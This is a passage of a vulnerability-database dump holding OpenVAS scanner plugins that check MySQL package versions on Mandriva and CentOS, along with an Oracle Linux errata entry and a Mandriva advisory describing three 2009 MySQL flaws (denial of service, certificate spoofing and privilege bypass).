rpm:\"lib64mysql-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "Check for the Version of mysql", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880613", "href": "http://plugins.openvas.org/nasl.php?oid=880613", "type": "openvas", "title": "CentOS Update for mysql CESA-2010:0109 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for mysql CESA-2010:0109 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n It was discovered that the MySQL client ignored certain SSL certificate\n verification errors when connecting to servers. A man-in-the-middle\n attacker could use this flaw to trick MySQL clients into connecting to a\n spoofed MySQL server. (CVE-2009-4028)\n \n Note: This fix may uncover previously hidden SSL configuration issues, such\n as incorrect CA certificates being used by clients or expired server\n certificates. This update should be carefully tested in deployments where\n SSL connections are used.\n \n A flaw was found in the way MySQL handled SELECT statements with subqueries\n in the WHERE clause, that assigned results to a user variable. A remote,\n authenticated attacker could use this flaw to crash the MySQL server daemon\n (mysqld). This issue only caused a temporary denial of service, as the\n MySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n \n When the "datadir" option was configured with a relative path, MySQL did\n not properly check paths used as arguments for the DATA DIRECTORY and INDEX\n DIRECTORY directives. An authenticated attacker could use this flaw to\n bypass the restriction preventing the use of subdirectories of the MySQL\n data directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n (CVE-2009-4030)\n \n Note: Due to the security risks and previous security issues related to the\n use of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\n depending on this feature should consider disabling it by adding\n "symbolic-links=0" to the "[mysqld]" section of the "my.cnf" configuration\n file. In this update, an example of such a configuration was added to the\n default "my.cnf" file.\n \n All MySQL users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. After installing this\n update, the MySQL server daemon (mysqld) will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"mysql on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-March/016527.html\");\n script_id(880613);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0109\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\", \"CVE-2008-2079\", \"CVE-2008-4098\");\n script_name(\"CentOS Update for mysql CESA-2010:0109 centos5 i386\");\n\n script_summary(\"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "Check for the Version of mysql", "modified": "2017-12-25T00:00:00", "published": "2010-01-19T00:00:00", "id": "OPENVAS:830806", "href": "http://plugins.openvas.org/nasl.php?oid=830806", "type": "openvas", "title": "Mandriva Update for mysql MDVSA-2010:012 (mysql)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:012 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in mysql:\n\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\n not (1) properly handle errors during execution of certain SELECT\n statements with subqueries, and does not (2) preserve certain\n null_value flags during execution of statements that use the\n GeomFromWKB function, which allows remote authenticated users to\n cause a denial of service (daemon crash) via a crafted statement\n (CVE-2009-4019).\n \n The vio_verify_callback function in viosslfactories.c in MySQL\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\n accepts a value of zero for the depth of X.509 certificates, which\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\n servers via a crafted certificate, as demonstrated by a certificate\n presented by a server linked against the yaSSL library (CVE-2009-4028).\n \n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\n privilege checks by calling CREATE TABLE on a MyISAM table with\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\n that are originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at which a\n pathname is modified to contain a symlink to a subdirectory of the\n MySQL data home directory, related to incorrect calculation of the\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\n (CVE-2009-4030).\n \n The updated packages have been patched to correct these\n issues. Additionally for 2009.1 and 2010.0 mysql has also been upgraded\n to the latest stable 5.1 release (5.1.42).\";\n\ntag_affected = \"mysql on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00053.php\");\n script_id(830806);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-19 08:58:46 +0100 (Tue, 19 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:012\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2008-4098\", \"CVE-2008-2079\", \"CVE-2009-4030\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:012 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql16\", rpm:\"libmysql16~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common-core\", rpm:\"mysql-common-core~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-core\", rpm:\"mysql-core~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql16\", rpm:\"lib64mysql16~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql16\", rpm:\"libmysql16~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql16\", rpm:\"lib64mysql16~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "description": "[5.0.77-4.2]\n- Add fixes for CVE-2009-4019, CVE-2009-4028, CVE-2009-4030\nResolves: #556505\n- Use non-expired certificates for SSL testing (upstream bug 50702)\n- Emit explicit error message if user tries to build RPM as root\n- Add comment suggesting disabling symbolic links in /etc/my.cnf ", "edition": 4, "modified": "2010-02-16T00:00:00", "published": "2010-02-16T00:00:00", "id": "ELSA-2010-0109", "href": "http://linux.oracle.com/errata/ELSA-2010-0109.html", "title": "mysql security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "description": "Certificate spoofing, privilege escalation, DoS.", "edition": 1, "modified": "2010-01-19T00:00:00", "published": "2010-01-19T00:00:00", "id": "SECURITYVULNS:VULN:10531", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10531", "title": "MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:012\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : mysql\r\n Date : January 17, 2010\r\n Affected: 2009.1, 2010.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been found and corrected in mysql:\r\n \r\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\r\n not (1) properly handle errors during execution of certain SELECT\r\n statements with subqueries, and does not (2) preserve certain\r\n null_value flags during execution of statements that use the\r\n GeomFromWKB function, which allows remote authenticated users to\r\n cause a denial of service (daemon crash) via a crafted statement\r\n (CVE-2009-4019).\r\n \r\n The vio_verify_callback function in viosslfactories.c in MySQL\r\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\r\n accepts a value of zero for the depth of X.509 certificates, which\r\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\r\n servers via a crafted certificate, as demonstrated by a certificate\r\n presented by a server linked against the yaSSL library (CVE-2009-4028).\r\n \r\n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\r\n privilege checks by calling CREATE TABLE on a MyISAM table with\r\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\r\n that are originally associated with pathnames without symlinks,\r\n and that can point to tables created at a future time at which a\r\n pathname is modified to contain a symlink to a subdirectory of the\r\n MySQL data home directory, related to incorrect calculation of the\r\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\r\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\r\n (CVE-2009-4030).\r\n \r\n The updated packages have been patched to correct these\r\n issues. Additionally for 2009.1 and 2010.0 mysql has also been upgraded\r\n to the latest stable 5.1 release (5.1.42).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4019\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4028\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4030\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-35.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-36.html\r\n 